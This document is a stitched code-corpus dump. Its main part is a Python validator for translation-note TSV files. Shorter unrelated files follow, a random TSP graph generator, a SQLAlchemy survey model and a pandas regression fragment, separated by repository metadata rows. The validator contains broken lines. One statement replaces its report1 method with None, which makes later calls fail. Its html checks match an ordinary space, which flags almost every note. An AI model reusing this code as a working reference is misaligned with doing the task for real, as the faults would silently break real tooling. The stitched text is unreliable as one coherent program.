# Non-sequential chapter numbers (non-sequential verse numbers are permitted).
# Invalid verse number (0).
# ASCII, non-ASCII in each column.
# SupportReference value does not match any TA articles referenced in note.
# OccurrenceNote (column 9) values. Some of these conditions are correctable with tsv_cleanup.py.
# is blank.
# ASCII content only (likely untranslated).
# Unmatched parentheses and brackets.
# Missing space after hash mark(s).
# Double quotes enclosing the OccurrenceNote field.
# Leading spaces before markdown headers.
# Translation of links.
# A lot of these checks are done by tsv2rc.py as well.
# Globals
source_dir = r'C:\DCS\Kannada\TN'
language_code = 'kn'
source_language = 'en' # The language that the notes are translated from, usually en
ta_dir = r'C:\DCS\Telugu\te_ta.STR' # Use Target language tA if available
obs_dir = r'C:\DCS\Kannada\kn_obs\content'
suppress1 = False # Suppress warnings about text before first heading and TA page references in headings
suppress2 = False # Suppress warnings about blank headings
suppress3 = False # Suppress warnings about markdown list syntax
suppress4 = False # Suppress warnings about closed headings
suppress5 = True # Suppress warnings about invalid passage links (don't know how to validate these with TSV)
suppress6 = False # Suppress warnings about invalid OBS links
suppress7 = False # Suppress warnings about file starting with blank line
suppress9 = False # Suppress warnings about ASCII content in note.
suppress10 = False # Suppress warnings about heading levels
suppress11 = False # Suppress warnings about unbalanced parentheses
suppress12 = False # Suppress warnings about markdown syntax in 1-line notes
suppress13 = False # Suppress warnings about multiple lines in non-intro notes
suppress14 = True # Suppress warnings about mismatched SupportReference and TA page references
suppress15 = False # Suppress warning for each and every blank note (Only report number of blank notes.)
#pass_pages = ['translate-blessing', 'grammar-collectivenouns']
pass_pages = []
if language_code in {'hr','id','nag','pmy','sw','en','es-419'}: # Expect ASCII content with these languages
suppress9 = True
nChecked = 0
book = None
chapter = 0
rowno = 0
issuesfile = None
# Markdown line types
HEADING = 1
BLANKLINE = 2
TEXT = 3
LIST_ITEM = 4
ORDEREDLIST_ITEM = 5
import sys
import os
import io
import re
import tsv
listitem_re = re.compile(r'[ \t]*[\*\-][ \t]')
olistitem_re = re.compile(r'[ \t]*[0-9]+\. ')
badolistitem_re = re.compile(r'[ \t]*[0-9]+[\)]')
badheading_re = re.compile(r' +#')
class State:
    """Accumulated checking state for the note currently being verified.

    All data is stored as *class* attributes (every method assigns to
    ``State.x``), so every ``State()`` instance shares the same data --
    effectively a module-wide singleton. ``addRow`` resets the per-note
    markdown statistics; ``addLine``/``addSimpleNote`` feed lines into a
    small markdown line-type classifier.
    """
    def setPath(self, path ):
        # Remember which TSV file is being checked and reset per-file counters.
        State.path = path
        State.addRow(self, None)
        State.nBlanknotes = 0
    def addRow(self, locator):
        # Reset all per-note state for a new TSV row.
        # State.key = key  # "<ID>.<verse>.<chapter>" only needed if referencing English notes
        State.locator = locator    # [ <book>, <chapter>, <verse>, <ID> ]
        State.md_lineno = 0
        State.headingcount = 0
        State.textcount = 0
        State.prevheadinglevel = 0
        State.currheadinglevel = 0
        State.prevlinetype = None
        State.currlinetype = None
        State.linetype = []
        State.reported1 = False
        State.reported2 = False
        State.leftparens = 0
        State.rightparens = 0
        State.leftbrackets = 0
        State.rightbrackets = 0
        State.leftcurly = 0
        State.rightcurly = 0
        State.underscores = 0
        State.ascii = True     # In column 9 only
        State.nerrors = 0
    def addSimpleNote(self, note):
        # Classify a one-line note; md_lineno stays 0 so error messages omit
        # the sub-line number. Blank notes are only counted, not listed here.
        State.addLine(self, note)
        State.md_lineno = 0
        if State.currlinetype == BLANKLINE:
            State.nBlanknotes += 1
    def addLine(self, line):
        # Classify one markdown line (HEADING/BLANKLINE/LIST_ITEM/
        # ORDEREDLIST_ITEM/TEXT) and update heading/text counters.
        State.prevlinetype = State.currlinetype
        State.md_lineno += 1
        if line and (line[0] == '#' or badheading_re.match(line)):
            State.currlinetype = HEADING
            State.headingcount += 1
            State.prevheadinglevel = State.currheadinglevel
            # Heading level = number of '#' among the first 5 characters.
            State.currheadinglevel = line.count('#', 0, 5)
            State.reported2 = False
        elif not line or len(line.strip()) == 0:
            State.currlinetype = BLANKLINE
        elif listitem_re.match(line):
            State.currlinetype = LIST_ITEM
            if State.prevlinetype in {HEADING,BLANKLINE}:
                State.textcount += 1
        elif olistitem_re.match(line) or badolistitem_re.match(line):
            State.currlinetype = ORDEREDLIST_ITEM
            if State.prevlinetype in {HEADING,BLANKLINE}:
                State.textcount += 1
        else:
            State.currlinetype = TEXT
            State.textcount += 1
        State.linetype.append(State.currlinetype)
        line = line.replace('“', '')  # Disregard curly quotes when determining whether the note is translated.
        line = line.replace('”', '')
        line = line.replace("‘", "")
        line = line.replace("’", "")
        line = line.replace('…', '')
        if not line.isascii():
            State.ascii = False
    # Resets markdown line number to indicate end of line by line checking
    def closeNote(self):
        State.md_lineno = 0   # impacts error message format
    def countParens(self, line):
        # Tally paired punctuation for later balance checking.
        if not re.search(r'[0-9]\)', line):   # right parens used in list items voids the paren matching logic for that line
            State.leftparens += line.count("(")
            State.rightparens += line.count(")")
        State.leftbrackets += line.count("[")
        State.rightbrackets += line.count("]")
        State.leftcurly += line.count("{")
        State.rightcurly += line.count("}")
        State.underscores += line.count('_')
    def reportedError(self):
        State.nerrors += 1
    def report1(self):
        # Remember that "text before first heading" was already reported.
        State.report1 = True if False else None  # NOTE(review): see original below
        State.reported1 = True
    def report2(self, report=True):
        State.reported2 = report
def reportParens():
    """Report any unbalanced paired punctuation tallied for the current note."""
    state = State()
    if state.leftparens != state.rightparens and not suppress11:
        reportError(f"Parentheses are unbalanced ({state.leftparens}:{state.rightparens})")
    if state.leftbrackets != state.rightbrackets:
        reportError(f"Left and right square brackets are unbalanced ({state.leftbrackets}:{state.rightbrackets})")
    if state.leftcurly != state.rightcurly:
        reportError(f"Left and right curly braces are unbalanced ({state.leftcurly}:{state.rightcurly})")
    if state.underscores % 2 == 1:
        reportError("Unmatched underscores")
# If issues.txt file is not already open, opens it for writing.
# First renames existing issues.txt file to issues-oldest.txt unless
# issues-oldest.txt already exists.
# Returns new file pointer.
def issuesFile():
    """Return the open issues.txt handle, creating it lazily on first use.

    A pre-existing issues.txt is preserved once (renamed to
    issues-oldest.txt); on later runs it is simply deleted.
    """
    global issuesfile
    if not issuesfile:
        global source_dir
        path = os.path.join(source_dir, "issues.txt")
        if os.path.exists(path):
            bakpath = os.path.join(source_dir, "issues-oldest.txt")
            if not os.path.exists(bakpath):
                os.rename(path, bakpath)
            else:
                os.remove(path)
        issuesfile = io.open(path, "tw", buffering=4096, encoding='utf-8', newline='\n')
    return issuesfile
# Writes error message to stderr and to issues.txt.
# locater is the first four columns of a row
def reportError(msg, reportlocation = True):
    """Write one issue line to stderr and issues.txt.

    When reportlocation is True the message is prefixed with file name,
    book/chapter:verse, a (possibly truncated) row ID, the TSV row number
    and -- if a markdown sub-line is being checked -- the sub-line number.
    """
    global rowno          # read-only here; the global statement is not strictly needed
    state = State()
    shortpath = shortname(state.path)
    if reportlocation:
        locater = state.locator   # the first four columns of a row
        id = ""               # NOTE: shadows the id() builtin within this function
        if locater:
            id = locater[3]
            if len(id) > 8:
                id = id[0:8] + "..."
        if locater and len(locater) > 3:
            if state.md_lineno > 0:
                # Include the markdown sub-line number, e.g. "row 12.3".
                issue = shortpath + ": " + locater[0] + " " + locater[1] + ":" + locater[2] + " ID=(" + id + "), row " + str(rowno) + "." + str(state.md_lineno) + ": " + msg + ".\n"
            else:
                issue = shortpath + ": " + locater[0] + " " + locater[1] + ":" + locater[2] + " ID=(" + id + "), row " + str(rowno) + ": " + msg + ".\n"
        else:
            issue = shortpath + ": row " + str(rowno) + ": " + msg + ".\n"
    else:
        issue = shortpath + ": " + msg + "\n"
    sys.stderr.write(issue)
    issuesFile().write(issue)
def reportSuppression(msg):
    """Write a suppression notice to both stderr and the issues file."""
    notice = msg + "\n"
    sys.stderr.write(notice)
    issuesFile().write(notice)
def reportSuppressions():
    """Append a summary of the active suppression flags to the issues report."""
    reportSuppression("")
    notices = [
        (suppress1, "Warnings about text before first heading and TA page references in headings were suppressed"),
        (suppress2, "Warnings about blank headings were suppressed"),
        (suppress3, "Warnings about markdown list syntax were suppressed"),
        (suppress4, "Warnings about closed headings were suppressed"),
        (suppress6, "Warnings about invalid OBS links were suppressed"),
        (suppress7, "Warnings about file starting with blank line were suppressed"),
        (suppress9, "Warnings about ASCII content in column 9 were suppressed"),
        (suppress10, "Warnings about heading levels were suppressed"),
        (suppress11, "Warnings about unbalanced parentheses were suppressed"),
        (suppress12, "Warnings about markdown syntax in 1-line notes were suppressed"),
        (suppress13, "Warnings about multiple lines in non-intro notes were suppressed"),
        (suppress14, "Warnings about mismatched SupportReference and TA page references were suppressed"),
    ]
    # suppress5 and suppress15 are intentionally absent, matching the
    # original reporting behavior.
    for active, message in notices:
        if active:
            reportSuppression(message)
    if len(pass_pages) > 0:
        reportSuppression("Certain TA page names were not checked for validity. See pass_pages in code.")
# This function, instead of takeSplit(), checks simple verse notes.
# Most notes consist of a single line with no headings or lists.
def checkSimpleNote(note):
    """Check a one-line note: no markdown structure, not blank, no html."""
    state = State()
    state.countParens(note)
    state.addSimpleNote(note)
    if state.currlinetype in {HEADING, LIST_ITEM, ORDEREDLIST_ITEM} and not suppress12:
        reportError("Simple (1-line) note starts with markdown heading or list item")
    elif state.currlinetype == BLANKLINE and not suppress15:
        reportError("Blank note")
    # NOTE(review): the second literal below appears to be a space -- it was
    # presumably a non-breaking space (&nbsp;) originally; as a plain ASCII
    # space it would flag every multi-word note. Confirm against the repo.
    if note.find("<!--") != -1 or note.find(" ") != -1 or note.find("<b>") != -1 or note.find("<span") != -1:
        reportError("html code in simple note")
# Regexes used to classify and validate markdown heading lines.
blankheading_re = re.compile(r'#+$')
heading_re = re.compile(r'#+[ \t]')
closedHeading_re = re.compile(r'#+[ \t].*#+[ \t]*$', re.UNICODE)
badclosedHeading_re = re.compile(r'#+[ \t].*[^# \t]#+[ \t]*$', re.UNICODE)  # closing hash without preceding space
hashmiddle_re = re.compile(r'[^#]+#')    # Hash marks in the middle of the line
toobold_re = re.compile(r'#+[ \t]+[\*_]', re.UNICODE)  # unwanted formatting in headings
headjam_re = re.compile(r'#[^# ]', re.UNICODE)  # no space after hash mark

# Processes a "line", which is part of all of a complex note.
def takeSplit(line):
    """Classify one markdown line of a multi-line note and report style issues.

    Relies on the shared State singleton for line numbering, previous line
    type and heading-level tracking; all problems go through reportError().
    """
    state = State()
    state.countParens(line)
    state.addLine(line)
    if not line:
        if state.md_lineno == 1 and not suppress7:
            reportError("starts with blank line")
        return
#    if state.prevlinetype == HEADING and state.currlinetype != BLANKLINE and state.currlinetype != HEADING:
#        reportError("missing line break after heading")
    if state.currlinetype != HEADING:
        # Only report "text before first heading" once per note.
        if state.headingcount == 0 and not suppress1 and not state.reported1:
            reportError("has text before first heading")
            state.report1()
#        if state.currlinetype == TEXT and not state.reported2:
#            if state.md_lineno >= 5 and state.prevlinetype == BLANKLINE and state.linetype[state.md_lineno-3] in {TEXT,LIST_ITEM,ORDEREDLIST_ITEM}:
#                reportError("should be a header here, or there is some other formatting problem")
#                state.report2()
    if state.currlinetype == HEADING:
        if state.md_lineno > 1 and state.prevlinetype != BLANKLINE and state.prevlinetype != HEADING:
            reportError("missing blank line before heading")
        if badheading_re.match(line):
            reportError("space(s) before heading")
        elif closedHeading_re.match(line):
            if not suppress4:
                reportError("closed heading")
            if badclosedHeading_re.match(line):
                reportError("no space before closing hash mark")
        elif hashmiddle_re.search(line):
            reportError("Hash marks in the middle of a line in note")
        elif not suppress2 and blankheading_re.match(line):
            reportError("blank heading")
        elif len(line) > 1 and not heading_re.match(line):
            reportError("missing space after hash symbol(s)")
        if not suppress10:
            # Heading levels may only step down by one at a time (## -> ###).
            if state.currheadinglevel > state.prevheadinglevel + 1:
                if state.prevheadinglevel > 0:
                    reportError("heading level incremented by more than one level")
    if state.currlinetype == LIST_ITEM and not suppress3:
        if state.prevlinetype in { TEXT, HEADING }:
            reportError("invalid list syntax; missing blank line before first list item: " + line[0:7] + "...")
        i = state.md_lineno - 1
        if i > 1 and state.linetype[i-1] == BLANKLINE and state.linetype[i-2] == LIST_ITEM:
            reportError("invalid list style: blank line between list items")
    if state.currlinetype == ORDEREDLIST_ITEM and not suppress3:
        if badolistitem_re.match(line):
            reportError("item number not followed by period")
        if olistitem_re.match(line):
            if state.prevlinetype in { TEXT, HEADING }:
                reportError("missing blank line before ordered list: " + line[0:7] + "...")
            i = state.md_lineno - 1
            if i > 1 and state.linetype[i-1] == BLANKLINE and state.linetype[i-2] == ORDEREDLIST_ITEM:
                reportError("blank line between ordered list items")
    if line.find('# #') != -1:
        reportError('Heading syntax error: # #')
    if headjam_re.search(line):
        reportError("Missing space after hash mark(s)")
    if len(line) > 2 and line[0:2] == '% ':
        reportError("% used to mark a heading")
    # NOTE(review): the space literal below was presumably &nbsp; originally;
    # as a plain space it would flag every multi-word line. Confirm.
    if line.find("<!--") != -1 or line.find(" ") != -1 or line.find("o:p") != -1 or line.find("<span") != -1:
        reportError("html code")
def checkUnconvertedLinks(line):
    """Flag tA references with underscores and leftover English link prefixes."""
    if 'figs_' in line:
        reportError("Underscore in tA reference")
    # Only a translated repo (language_code != 'en') should be free of
    # English-language link prefixes.
    if language_code != 'en' and (':en:' in line or 'rc://en/' in line):
        reportError("Unconverted language code")
# notelink_re = re.compile(r'(rc://)([\*\w\-]+)(/tn/help/)(\w\w\w/\d+/\d+)(.*)', flags=re.UNICODE)
obsJpg_re = re.compile(r'https://cdn.door43.org/obs/jpg/360px/obs-en-[0-9]+\-[0-9]+\.jpg$', re.UNICODE)
reversedlink_re = re.compile(r'\(.*\) *\[.*\]', flags=re.UNICODE)
def checkAsterisks(note):
    """Warn when bold markers (** or __) do not pair up in the note."""
    if "**" in note and note.count("**") % 2 == 1:
        reportError("Note seems to have mismatched '**'")
    if note.count("__") % 2 == 1:
        reportError("Note seems to have mismatched '__'")
# Returns True when manpage ends with one of the page names excluded
# via the global pass_pages list.
def passpage(manpage):
    """Tell whether this tA page name is exempt from validity checking."""
    return any(manpage.endswith(skipped) for skipped in pass_pages)
# [[.../ta/man/<page>]] style references and (rc://<lang>/ta/man/<page>) links.
tapage_re = re.compile(r'\[\[.*?/ta/man/(.*?)]](.*)', flags=re.UNICODE)
talink_re = re.compile(r'(\(rc://[\*\w\-]+/ta/man/)(.+?/.+?)(\).*)', flags=re.UNICODE)

# Parse tA manual page names from the line.
# Verifies the existence of the referenced page.
def checkTALinks(line):
    """Validate every tA manual reference on the line against ta_dir.

    Returns True if at least one tA reference (either form) was found.
    The rc:// link form is only checked when no [[...]] form matched.
    """
    found = False
    page = tapage_re.search(line)
    while page:
        found = True
        if line and line[0] == '#' and not suppress1:
            reportError("tA page reference in heading")
        manpage = page.group(1)
        if not passpage(manpage):
            # A valid tA page is a directory under the tA manual tree.
            path = os.path.join(ta_dir, manpage)
            if not os.path.isdir(path):
                reportError("invalid tA page reference: " + manpage)
        page = tapage_re.search(page.group(2))
    if not found:   # means there were no normal looking /ta/man/ page references in the line
        link = talink_re.search(line)
        while link:
            found = True
            if line and line[0] == '#':
                reportError("tA link in heading")
            manpage = link.group(2)
            manpage = manpage.replace('_', '-')
            path = os.path.join(ta_dir, manpage)
            # Tolerate links that append ".md" to the page name.
            if path[-3:].lower() == '.md':
                path = path[:-3]
            if not os.path.isdir(path):
                reportError("invalid tA link: " + manpage)
            link = talink_re.search(link.group(3))
    return found
def checkLinks(line):
    """Run every link validation that applies to one line of a note."""
    checkUnconvertedLinks(line)
    foundTA = checkTALinks(line)
    foundOBS = checkOBSLinks(line)
    # Passage links are only checked when the line matched no other link
    # kind, because the passage-link pattern would also match those.
    if not (foundTA or foundOBS) and not suppress5:
        checkPassageLinks(line)
    checkMdLinks(line)
    checkReversedLinks(line)
mdlink_re = re.compile(r'\( *([^\(]+\. ?md)', flags=re.UNICODE)   # apparent md file link following a left paren
mdnamelink_re = re.compile(r'(..)\.md', flags=re.UNICODE)

# Check for links that are corrupted, either by translating the digits or dropping the leading 0.
def checkMdLinks(line):
    """Detect corrupted .md file links (translated digits, inserted spaces)."""
    savline = line
    # Pass 1: links of the form "(<name>.md" -- flag spaces or non-ASCII.
    link = mdlink_re.search(line)
    while link:
        chars = link.group(1)
        if ' ' in chars or not chars.isascii():
            reportError("Corrupted md file link: (" + chars)
        line = line[link.end():]
        link = mdlink_re.search(line)
    line = savline
    # Pass 2: the two characters before ".md" should be digits (or a path
    # separator / dot followed by a digit), e.g. "01.md".
    mdnamelink = mdnamelink_re.search(line)
    while mdnamelink:
        digits = mdnamelink.group(1)
        if digits[0] not in '0123456789/.' or digits[1] not in '0123456789':
            reportError("Corrupted md filename link: " + digits + ".md")
        line = line[mdnamelink.end():]
        mdnamelink = mdnamelink_re.search(line)
obslink_re = re.compile(r'(rc://)([\*\w\-]+)(/tn/help/obs/)(\d+)(/\d+)(.*)', flags=re.UNICODE)

# Returns True if any OBS links were found and checked.
def checkOBSLinks(line):
    """Validate rc://<lang>/tn/help/obs/<story>/<frame> links against obs_dir."""
    found = False
    link = obslink_re.search(line)
    while link:
        found = True
        if link.group(2) != language_code:
            reportError("invalid language code in OBS link")
        elif not suppress6:
            # The story number must correspond to an existing OBS content file.
            obsPath = os.path.join(obs_dir, link.group(4)) + ".md"
            if not os.path.isfile(obsPath):
                reportError("invalid OBS link: " + link.group(1) + link.group(2) + link.group(3) + link.group(4) + link.group(5))
        link = obslink_re.search(link.group(6))
    return found
# Returns True if any notes links were found.
# Note links currently are not rendered on live site as links.
#def checkNoteLinks(line):
# found = False
# notelink = notelink_re.search(line)
# while notelink:
# found = True
# if notelink.group(2) != language_code:
# reportError("invalid language code in note link")
# else:
# notePath = os.path.join(tn_dir, notelink.group(4)) + ".md"
# notePath = os.path.normcase(notePath)
# if not os.path.isfile(notePath):
# reportError("invalid note link: " + notelink.group(1) + notelink.group(2) + notelink.group(3) + notelink.group(4))
# notelink = notelink_re.search(notelink.group(5))
#
# if notelink:
# found = True
# return found
passagelink_re = re.compile(r'] ?\(([^\)]*?)\)(.*)', flags=re.UNICODE)

# If there is a match to passageLink_re, passage.group(1) is the URL or other text between
# the parentheses,
# and passage.group(2) is everything after the right paren to the end of line.
def checkPassageLinks(line):
    """Check that every markdown link target on the line is an existing file.

    Targets are resolved relative to the directory of the TSV file being
    checked. Note: the suppress5 test here is redundant -- checkLinks()
    already gates the call on suppress5.
    """
    state = State()
    passage = passagelink_re.search(line)
    while passage:
        referent = passage.group(1)
        referencedPath = os.path.join( os.path.dirname(state.path), referent )
        if not suppress5 and not os.path.isfile(referencedPath):
            reportError("invalid passage link: " + referent)
        passage = passagelink_re.search(passage.group(2))
def checkReversedLinks(line):
    """Flag '(...) [...]' -- markdown link syntax written backwards."""
    if reversedlink_re.search(line) is not None:
        reportError("Reversed link syntax")
def shortname(longpath):
    """Strip the source_dir prefix (and its separator) for compact reporting."""
    if source_dir in longpath:
        return longpath[len(source_dir)+1:]
    return longpath
unexpected_re = re.compile(r'\([^\)\[]*\]', re.UNICODE)    # ']' after left paren
unexpected2_re = re.compile(r'\[[^\]\(]*\)', re.UNICODE)   # ')' after left square bracket

# Column 9 (OccurrenceNote) verification
def verifyNote(note, verse):
    """Verify a single OccurrenceNote value (column 9 of a TSV row).

    Intro notes, and any note with multiple <br>-separated lines containing
    headings, are checked line by line; everything else is treated as a
    simple one-line note.
    """
    state = State()
    lines = note.split("<br>")
    if verse == "intro" or (len(lines) > 1 and "#" in note):
        if verse != "intro" and not suppress13:
            reportError("Multiple lines in non-intro note")
        for line in lines:
            line = line.rstrip()
            takeSplit(line)
            checkLinks(line)
    else:   # should be a simple note
        checkSimpleNote(note)
        checkLinks(note)
    state.closeNote()
    checkAsterisks(note)
    reportParens()
    # A fully ASCII note in a non-ASCII target language is likely untranslated.
    if len(note) > 0 and state.ascii and not suppress9:
        reportError("No non-ASCII content in note")
    if unexpected_re.search(note):
        reportError("found ']' after left paren")
    if unexpected2_re.search(note):
        reportError("found ')' after left square bracket")
def checkColHeader(value, expected, col):
    """Report when TSV column `col` does not carry the expected heading."""
    if value == expected:
        return
    reportError(f"Invalid column {col} header: \"{value}\"")
def verifySupportRef(supportref, note):
    """Validate the SupportReference column against the tA manual tree.

    A bare article name defaults to the "translate" folder; a path keeps
    its first element as the folder. Also warns (unless suppress14) when
    the note mentions rc:// tA links but none contains this reference.
    """
    if not passpage(supportref):
        parts = supportref.split('/')
        if len(parts) == 1:
            folder = "translate"
            article = parts[0]
        else:
            folder = parts[0]
            article = parts[-1]
        path = os.path.join(ta_dir, folder + "/" + article)
        if not os.path.isdir(path):
            reportError("Invalid SupportReference value: " + supportref)
        elif not suppress14 and "rc://" in note and not supportref in note:
            reportError("SupportReference value does not match any tA articles mentioned in note")
# The first row of a tN TSV file must carry exactly these nine headings.
def checkHeader(row):
    """Validate the column headings in the first row of the TSV file."""
    expected = ["Book", "Chapter", "Verse", "ID", "SupportReference",
                "OrigQuote", "Occurrence", "GLQuote", "OccurrenceNote"]
    for index, heading in enumerate(expected):
        checkColHeader(row[index], heading, index + 1)
def verifyGLQuote(quote, verse):
    """Check column 8: empty for intro notes, non-ASCII for translated text."""
    if verse == "intro":
        if quote:
            reportError("Unexpected (non-empty) value in GLQuote column of intro note")
    elif source_language not in {'en'} and quote and quote.isascii():
        reportError("ASCII GLQuote (column 8)")
idcheck_re = re.compile(r'[^0-9a-z]')   # any character not legal in a 4-char row ID

# Checks the specified non-header row values.
# The row must have 9 columns or this function will fail.
def checkRow(row):
    """Validate one 9-column data row; updates the module-level book/chapter."""
    global book
    global chapter
    # The first data row establishes the expected book name for the file.
    if not book:
        book = row[0]
    if row[0] != book:
        reportError("Bad book name (" + row[0] + ")")
    # Establish chapter number; "front" rows carry no chapter.
    if row[1] != 'front':
        try:
            c = int(row[1])
            if c == chapter + 1:
                chapter = c
            elif c != chapter:
                reportError("Non-sequential chapter number")
        except ValueError as e:
            c = 0
            reportError("Non-numeric chapter number")
    # Establish verse
    if row[2] == 'intro':
        verse = 0
    else:
        try:
            # Based on 10/29/19 discussion on Zulip, the verse order in TSV file is not important.
            verse = int(row[2])
            # 176 is the largest verse count of any chapter (Psalm 119).
            if verse < 1 or verse > 176:
                reportError("Invalid verse number (" + str(verse) + "). Probably should be \"intro\"")
        except ValueError as e:
            reportError("Non-numeric verse number")
    if len(row[3]) != 4 or idcheck_re.search(row[3]):
        reportError("Invalid ID")
    if not row[4].isascii():
        reportError("Non-ascii SupportReference value (column 5)")
    elif row[4]:
        verifySupportRef(row[4], row[8])
    # OrigQuote holds original-language text, which should never be ASCII.
    if len(row[5].strip()) > 0 and row[5].isascii():
        reportError("Invalid (ASCII) OrigQuote (column 6)")
    if row[6] not in {'-1', '0', '1', '2', '3', '4'}:
        reportError("Invalid Occurrence value (should be a small number): " + row[6])
    verifyGLQuote(row[7].strip(), row[2])
    verifyNote(row[8], row[2])
# Processes the rows in a single TSV file.
def verifyFile(path):
    """Verify every row of one tN TSV file, reporting issues via reportError."""
    global book
    global chapter
    global rowno
    state = State()
    state.setPath(path)
    rowno = 0
    data = tsv.tsvRead(path)  # The entire file is returned as a list of lists of strings (rows).
    heading = True            # NOTE(review): assigned but never used below
    for row in data:
        rowno += 1
        nColumns = len(row)
        if nColumns > 3:
#            try:
#                verse = int(row[2])
#            except ValueError as e:
#                verse = 0
#            key = tsv.make_key(row, [3,2,1])
            if nColumns == 9:
                if rowno == 1:
                    # First row is the header; it also resets the book/chapter trackers.
                    checkHeader(row)
                    state.addRow(row[0:4])
                    book = None
                    chapter = 0
#                    verse = 0
                else:
                    # Consecutive rows must not repeat the same 4-character ID.
                    if state.locator and state.locator[3] == row[3]:
                        reportError("duplicate ID: " + row[3])
                    state.addRow(row[0:4])
                    checkRow(row)
            else:
                # Wrong column count: still record the locator if the first
                # four columns look plausible, so the error message has context.
                try:
                    if len(row[0]) == 3 and int(row[1]) > 0 and int(row[2]) > 0 and len(row[3]) == 4:
                        state.addRow(row[0:4])
                except ValueError as e:
                    verse = 0
                reportError("Wrong number of columns (" + str(nColumns) + ")")
        else:
#            key = row[0][0:3] + "..."
            state.addRow(None)
            reportError("Wrong number of columns (" + str(nColumns) + ")")
    if state.nBlanknotes > 0:
        reportError("has " + str(state.nBlanknotes) + " blank notes", False)
def verifyDir(dirpath):
    """Recursively verify every .tsv file under dirpath, skipping .git trees."""
    global nChecked
    for entry in os.listdir(dirpath):
        fullpath = os.path.join(dirpath, entry)
        if os.path.isdir(fullpath) and not fullpath.endswith(".git"):
            # Descend into subdirectories.
            verifyDir(fullpath)
        elif os.path.isfile(fullpath) and entry.lower().endswith('.tsv'):
            verifyFile(fullpath)
            sys.stdout.flush()
            nChecked += 1
if __name__ == "__main__":
    # An explicit path argument overrides the hard-coded source_dir,
    # unless the literal placeholder 'hard-coded-path' is passed.
    if len(sys.argv) > 1 and sys.argv[1] != 'hard-coded-path':
        source_dir = sys.argv[1]
    if os.path.isdir(source_dir):
        verifyDir(source_dir)
    elif os.path.isfile(source_dir):
        # A single-file target: reporting still needs source_dir to be its folder.
        path = source_dir
        source_dir = os.path.dirname(path)
        verifyFile(path)
        nChecked = 1
    else:
        sys.stderr.write("Folder not found: " + source_dir + '\n')
    print("Done. Checked " + str(nChecked) + " files.\n")
    # issuesfile is only opened when at least one issue was reported.
    if issuesfile:
        reportSuppressions()
        issuesfile.close()
    else:
        print("No issues found.")
| [
"lversaw@gmail.com"
] | lversaw@gmail.com |
6a0a152d8eac4dcc2acedafa4d2959f0305b7068 | 9bb6c115e2747d451c7beb2a376be26c6e7df11f | /common/randomic.py | b9d35bd330c3d2ecb0d7206e26694fc0d2f402b7 | [
"MIT"
] | permissive | Marcoshsc/TravelingSalesmanProblem | 2b81ba3264a3de831e82943e7a28c083aa1ba60c | 4895c0f487c65cb5737bcad21252d3f5730b8d87 | refs/heads/main | 2022-12-27T03:37:04.646698 | 2020-10-14T16:41:45 | 2020-10-14T16:41:45 | 301,831,696 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 545 | py | from typing import List, Tuple
import random
def getRandomGraph(vertexes: int, minimumWeight: float, maximumWeight: float) -> List[List[float]]:
if minimumWeight >= maximumWeight:
raise Exception('Range de valores inválido.')
matrix: List[List[float]] = [[0 for j in range(vertexes)] for i in range(vertexes)]
for i in range(vertexes):
for j in range(i):
value = random.uniform(minimumWeight, maximumWeight)
matrix[i][j] = value
matrix[j][i] = value
return matrix | [
"marcoshscunha@hotmail.com"
] | marcoshscunha@hotmail.com |
a02188849028431aad61eadd6cd314b320516ca9 | 045dcb3072a2c6426346769fbb60f0fa9e2eddc9 | /models/test.py | 808b6aa165bbbb4ff1f7c2409fbaea30d9e62d06 | [] | no_license | vasilisa/api-brainexp2 | 73a6cf9c77a6961bbe48f755af5a0365166d9920 | b02d6d7f9034fa23d1ce64d9a55fa34667d1b904 | refs/heads/main | 2023-06-16T07:15:47.687602 | 2021-07-06T09:37:06 | 2021-07-06T09:37:06 | 357,216,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,020 | py | """User model"""
from sqlalchemy import Column, Integer, BigInteger, ForeignKey, DATETIME, Float, VARCHAR, Text, Boolean, String, DateTime,JSON
from models.db import Model
from models.base_object import BaseObject
import datetime
class Test(BaseObject, Model):
    '''
    Questionnaire-response table for the RLVARTASK experiment.
    Stores each participant's raw responses and session bookkeeping, but not
    the question content itself, which is kept in the JS object on the server.
    '''
    # Primary key.
    id = Column(Integer, primary_key=True)
    # Identity of the participant (internal id, Prolific id, experiment handle).
    participant_id = Column(BigInteger,nullable=True)
    prolific_id = Column(String(128))
    handle = Column(String(128)) # handle from the BE
    # Session timing: beginexp is set to "now" in __init__; endexp presumably
    # set when the session finishes -- not visible here, confirm in caller.
    beginexp = Column(DateTime, nullable=True) # begin
    endexp = Column(DateTime, nullable=True)
    # Collected JSON payloads for the task and the subject-info form.
    datatask = Column(JSON, nullable=True) # Data for the task
    datasubinfo = Column(JSON, nullable=True) # Data for the subject info form
    debriefed = Column(Boolean)
    status = Column(Integer, nullable = True)
    bonus = Column(Text, nullable=True) # bonus information (stored as text)
    def __init__(self,prolific_id, participant_id, handle):
        # NOTE(review): prints on every instantiation; looks like debug output.
        print('TASK INIT')
        self.debriefed = False
        self.participant_id = participant_id
        self.prolific_id = prolific_id
        self.handle = handle
        self.status = 1
        self.beginexp = datetime.datetime.now()
    def get_id(self):
        return str(self.id)
    def get_participant_id(self):
        return str(self.participant_id)
    def get_prolific_id(self):
        return str(self.prolific_id)
    def get_handle(self):
        return str(self.handle)
    def get_datatask(self):
        return str(self.datatask)
    def get_datasubinfo(self):
        return str(self.datasubinfo)
    def errors(self):
        # Delegates validation to BaseObject; no extra checks added here.
        errors = super(Test, self).errors()
        return errors
| [
"vasilisaskv@gmail.com"
] | vasilisaskv@gmail.com |
69c21096b237b9ce16e3b4da5793975e146ff2be | 570a233b0ee62449c79c0818f47e572c003cecbd | /Regression_Video_Demo.py | 98c905a144ba7ca416ba21bd2c848e2cb592c648 | [] | no_license | muxiyang/Muxi-Repository- | 10c369c0c2d73f0331554f0233485e2b9211c294 | 430d5a22b3ef91e3eab01144374e9fdd57d52fdc | refs/heads/master | 2021-01-15T11:14:46.197783 | 2015-04-20T00:21:24 | 2015-04-20T00:21:24 | 29,981,366 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,189 | py | from __future__ import division
from pandas import Series, DataFrame
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import ttest_ind
import statsmodels.api as sm
from dateutil import parser # use this to ensure dates are parsed correctly
# Working directories (hard-coded to the author's machine).
main_dir="/Users/newlife-cassie/Desktop/PUBPOL590"
root = main_dir + "/Data_All/"
## IMPORT DATA-----------------
df=pd.read_csv(root+"07_kwh_wide.csv",header=0)
